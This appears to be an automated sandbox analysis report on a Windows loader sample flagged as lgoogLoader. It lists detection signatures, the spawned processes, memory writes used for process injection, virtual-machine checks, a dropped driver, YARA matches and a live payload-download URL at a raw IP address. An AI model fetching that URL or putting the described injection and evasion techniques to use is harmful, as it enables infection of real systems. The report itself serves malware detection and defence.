
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 862324
MD5: 851dfeb9035473532d796a9b41608b3c
SHA1: beca84bb1ffd0146f8e5b87a01b14b42e8d50e2b
SHA256: 5867c5321292565fa017f4e88b6c4894572d7fa557e9a0ddb1ced4362413b6b3
Tags: exe

Detection

lgoogLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected lgoogLoader
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Contains functionality to infect the boot sector
Sample is not signed and drops a device driver
Contain functionality to detect virtual machines
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large strings
Contains functionality to inject code into remote processes
Sample uses string decryption to hide its real strings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Enables driver privileges
Drops PE files
Creates driver files
Contains functionality to launch a program with higher privileges
Spawns drivers
PE / OLE file has an invalid certificate
Creates or modifies windows services
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
  • System is w10x64
  • file.exe (PID: 6596 cmdline: C:\Users\user\Desktop\file.exe MD5: 851DFEB9035473532D796A9B41608B3C)
    • jsc.exe (PID: 2040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe MD5: 2B40A449D6034F41771A460DADD53A60)
    • mscorsvw.exe (PID: 3092 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe MD5: B00E9325AC7356A3F4864EAAAD48E13F)
    • aspnet_compiler.exe (PID: 4768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe MD5: 7809A19AA8DA1A41F36B60B0664C4E20)
    • RegSvcs.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe MD5: 59FCE79E9D81AB9E2ED4C3561205F5DF)
    • dfsvc.exe (PID: 4136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe MD5: 48FD4DD682051712E3E7757C525DED71)
    • aspnet_regbrowsers.exe (PID: 2192 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe MD5: BF7E443F1E1FA88AD5A2A5EB44F42834)
    • AddInProcess32.exe (PID: 4740 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
LgoogLoader | LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file. | No Attribution | - | https://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth (Nextron Systems) | (strings listed below)
  • 0xade:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF
  • 0x6546:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF
00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_lGoogLoader | Yara detected lgoogLoader | Joe Security | -
    No Sigma rule has matched
    No Snort rule has matched



    AV Detection

    Source: file.exe | ReversingLabs: Detection: 13%
    Source: file.exe | Virustotal: Detection: 20%
    Source: http://109.206.241.33/files/1un.config.CfgEncFile | Avira URL Cloud: Label: malware
    Source: http://109.206.241.33/files/1un.config.CfgEncFileMZ | Avira URL Cloud: Label: malware
    Source: http://109.206.241.33/files/1un.config.CfgEncFile | Virustotal: Detection: 16%
    Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack | String decryptor: e_lh_fMLH^ff
    Source: 7.2.AddInProcess32.exe.400000.0.unpack | Avira: Label: TR/Patched.Gen
    Source: 7.2.AddInProcess32.exe.2b50000.4.unpack | Avira: Label: TR/Crypt.XPACK.Gen3
    Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr
    Source: Binary string: C:\Users\Konka\source\repos\WinFormGregorCatch\obj\x86\Debug\WinFormGregorCatch.pdb source: file.exe
    Source: AddInProcess32.exe | String found in binary or memory: http://109.206.241.33/files/1un.config.CfgEncFile
    Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.392608147.0000000002B40000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://109.206.241.33/files/1un.config.CfgEncFileMZ
    Source: file.exe | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
    Source: file.exe | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
    Source: file.exe | String found in binary or memory: http://ocsp.sectigo.com0
    Source: AddInProcess32.exe | String found in binary or memory: http://www.sysinternals.com
    Source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd
    Source: file.exe | String found in binary or memory: https://sectigo.com/CPS0
    Source: ?????.sys.0.dr | String found in binary or memory: https://www.sysinternals.com0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_02B51000 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,Sleep,PathFileExistsW,DeleteFileW,URLDownloadToFileW,PathFileExistsW,GetProcessHeap,HeapAlloc,StrCatW,StrCatW,StrCatW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,Sleep,7_2_02B51000

    System Summary

    Source: file.exe, u9ff3???????????????/??????????????????.cs | Long String: Length: 636952
    Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth (Nextron Systems), description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00404AF0 7_2_00404AF0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004084B7 7_2_004084B7
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_01381AA8 7_2_01381AA8
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00402050 _memset,_memset,_memset,_memset,_memset,__wcsicmp,__wcsicmp,__wcsicmp,SetEnvironmentVariableW,_memset,_wcscpy_s,_wcscat_s,CreateProcessW,GetLastError,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,_wcscpy_s,_memset,_memset,_memset,CreateProcessWithLogonW,GetLastError,EnumWindows,Sleep,Sleep,EnumWindows,CloseHandle,CloseHandle,CloseHandle,LoadIconW,LoadIconW,LoadIconW,LoadCursorW,RegisterClassExW,CreateDialogParamW,GetMessageW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetMessageW,LocalFree,7_2_00402050
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_02B5355B: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA,7_2_02B5355B
    Source: file.exe | Static PE information: No import functions for PE file found
    Source: file.exe, 00000000.00000000.310047330.000001C5BAD38000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWinFormGregorCatch.exeF vs file.exe
    Source: file.exe | Binary or memory string: OriginalFilenameWinFormGregorCatch.exeF vs file.exe
    Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Load Driver
    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\?????.sys
    Source: C:\Users\user\Desktop\file.exe | Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKill
    Source: file.exe | Static PE information: invalid certificate
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
    Source: file.exe | ReversingLabs: Detection: 13%
    Source: file.exe | Virustotal: Detection: 20%
    Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log
    Source: ?????.sys.0.dr | Binary string: \DosDevices\PROCEXP152\ObjectTypes\\Device\PROCEXP152PsAcquireProcessExitSynchronizationPsReleaseProcessExitSynchronizationMmGetMaximumNonPagedPoolInBytesObGetObjectTypeMutantIoCreateDeviceSecureIoValidateDeviceIoControlAccessD:P
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@15/2@0/0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004029C0 _memset,_memset,SHGetMalloc,SHGetDesktopFolder,SearchPathW,GetLastError,CoInitialize,CoCreateInstance,#217,#173,CoUninitialize,7_2_004029C0
    Source: file.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
    Source: C:\Users\user\Desktop\file.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: file.exe, u9ff3???????????????/??????????????????.cs | Base64 encoded string: [long base64 string omitted]
    Source: file.exe, u9ff3???????????????/??????????????????.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
    Source: file.exe | Static file information: File size 1338216 > 1048576
    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: file.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x144800
    Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

    Data Obfuscation

    Source: Yara match | File source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: file.exe, u9ff3???????????????/??????????????????.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00404ACD push ecx; ret 7_2_00404AE0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_01382D32 push cs; retf 7_2_01382D36
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0138155C push es; retf 7_2_01381571
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_013821DB push edx; ret 7_2_013821DC
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_01382DD4 push cs; retf 7_2_01382DEA
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_01382DC3 push cs; retf 7_2_01382DD1
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_01382036 push ss; retf 7_2_0138204B
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_01382E0D push cs; retf 7_2_01382E1B
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_01384A8A push esi; iretd 7_2_01384A8D
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00402CB0 _memset,_memset,_wcscpy_s,_wcscat_s,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetLastError,LoadLibraryW,GetProcAddress,_wcschr,_wcscpy_s,GetComputerNameW,CredUIParseUserNameW,CoTaskMemFree,7_2_00402CB0

    Persistence and Installation Behavior

    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA, \\.\PhysicalDrive%d 7_2_02B5355B
    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\?????.sys

    Boot Survival

    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA, \\.\PhysicalDrive%d 7_2_02B5355B
    Source: C:\Users\user\Desktop\file.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TaskKill
    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: VMware VBox QEMU QEMU VMware VBox QEMU QEMU 7_2_02B5372C
    Source: C:\Users\user\Desktop\file.exe TID: 6576 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_7-7671
    Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\?????.sys
    Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | API coverage: 5.9 %
    Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | API call chain: ExitProcess graph end node graph_7-7672
    Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: VMware
    Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Chrome/HEADIsWow64Processkernel32X:\Windows\SysWOW64\ntdll.dllntdll.dllRtlInitUnicodeStringZwOpenFileZwCreateSectionZwMapViewOfSectionNtUnmapViewOfSectionNtQueryInformationProcess{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}RtlRandomExntdll:y--\Driver\Device ParametersEDID(IsActive)(NotActive)BAD EDID!No EDID!--Nm:SYSTEM\ControlSet001\Enum\DISPLAY\\.\PhysicalDrive%d---VMwareVirtualBoxVBoxQEMUDisplay AdapterNon-PnPVMwareVirtualBoxVBoxQEMUWestern Disk HARDDISK(1):(2):text/*Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00405700
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00402CB0 _memset,_memset,_wcscpy_s,_wcscat_s,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetLastError,LoadLibraryW,GetProcAddress,_wcschr,_wcscpy_s,GetComputerNameW,CredUIParseUserNameW,CoTaskMemFree,7_2_00402CB0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004039C0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,7_2_004039C0
    Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Debug
    Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00407219 SetUnhandledExceptionFilter,7_2_00407219
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040C52A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0040C52A
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_02B53C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_02B53C44

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000
    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 401000
    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 40D000
    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 413000
    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 416000
    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 418000
    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: A98008
    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_02B522F0 GetProcessHeap,HeapAlloc,StrCatW,StrCatW,StrCatW,StrCatW,CreateProcessW,GetThreadContext,GetProcessHeap,HeapAlloc,VirtualQueryEx,WriteProcessMemory,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,TerminateProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_02B522F0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00402050 _memset,_memset,_memset,_memset,_memset,__wcsicmp,__wcsicmp,__wcsicmp,SetEnvironmentVariableW,_memset,_wcscpy_s,_wcscat_s,CreateProcessW,GetLastError,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,_wcscpy_s,_memset,_memset,_memset,CreateProcessWithLogonW,GetLastError,EnumWindows,Sleep,Sleep,EnumWindows,CloseHandle,CloseHandle,CloseHandle,LoadIconW,LoadIconW,LoadIconW,LoadCursorW,RegisterClassExW,CreateDialogParamW,GetMessageW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetMessageW,LocalFree,7_2_00402050
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
    Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: GetLocaleInfoA,7_2_0040B123
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040C66D cpuid 7_2_0040C66D
    Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00407ACC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00407ACC
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004039C0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,7_2_004039C0
    MITRE ATT&CK matrix, techniques flagged for this sample (the bracketed digits are the hit badges printed in the report's matrix, reproduced as shown):
    • Initial Access: Valid Accounts [1]
    • Execution: Native API [2]
    • Persistence: Valid Accounts [1]; Windows Service [2]; Bootkit [1]; LSASS Driver [2]
    • Privilege Escalation: Valid Accounts [1]; Exploitation for Privilege Escalation [1]; Access Token Manipulation [1]; Windows Service [2]; Process Injection [311]; LSASS Driver [2]
    • Defense Evasion: Masquerading [1]; Valid Accounts [1]; Access Token Manipulation [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [121]; Process Injection [311]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [11]; Bootkit [1]; Software Packing [11]
    • Credential Access: none flagged
    • Discovery: System Time Discovery [1]; Security Software Discovery [121]; Process Discovery [1]; Virtualization/Sandbox Evasion [121]; System Information Discovery [34]
    • Lateral Movement: none flagged
    • Collection: Archive Collected Data [11]
    • Exfiltration: none flagged
    • Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [1]
    • Network Effects, Remote Service Effects, Impact: none flagged
    Behavior Graph (ID: 862324, Sample: file.exe, Start date: 09/05/2023, Architecture: WINDOWS, Score: 100)

    Signatures attached to the root node:
    • Multi AV Scanner detection for domain / URL
    • Antivirus detection for URL or domain
    • Multi AV Scanner detection for submitted file
    • 4 other signatures

    Process tree:
    • file.exe (started)
      Dropped files: C:\Users\user\AppData\Local\Temp\?????.sys (PE32+); C:\Users\user\AppData\Local\...\file.exe.log (ASCII)
      Signatures: Writes to foreign memory regions; Sample is not signed and drops a device driver; Injects a PE file into a foreign processes
      Child processes: AddInProcess32.exe, jsc.exe, mscorsvw.exe, 4 other processes
    • AddInProcess32.exe (started by file.exe)
      Signatures: Contains functionality to infect the boot sector; Contain functionality to detect virtual machines; Contains functionality to inject code into remote processes

    Antivirus detection, initial sample:
    • Source: file.exe, Detection: 14%, Scanner: ReversingLabs, Label: Win64.Trojan.CrypterX
    • Source: file.exe, Detection: 20%, Scanner: Virustotal
    Antivirus detection, dropped files:
    • Source: C:\Users\user\AppData\Local\Temp\?????.sys, Detection: 0%, Scanner: ReversingLabs
    • Source: C:\Users\user\AppData\Local\Temp\?????.sys, Detection: 1%, Scanner: Virustotal
    Antivirus detection, unpacked PE files:
    • Source: 0.2.file.exe.1c5babf0000.0.unpack, Detection: 100%, Scanner: Avira, Label: HEUR/AGEN.1363250
    • Source: 7.2.AddInProcess32.exe.400000.0.unpack, Detection: 100%, Scanner: Avira, Label: TR/Patched.Gen
    • Source: 7.2.AddInProcess32.exe.2b50000.4.unpack, Detection: 100%, Scanner: Avira, Label: TR/Crypt.XPACK.Gen3
    Antivirus detection, domains: No Antivirus matches
    Antivirus detection, URLs:
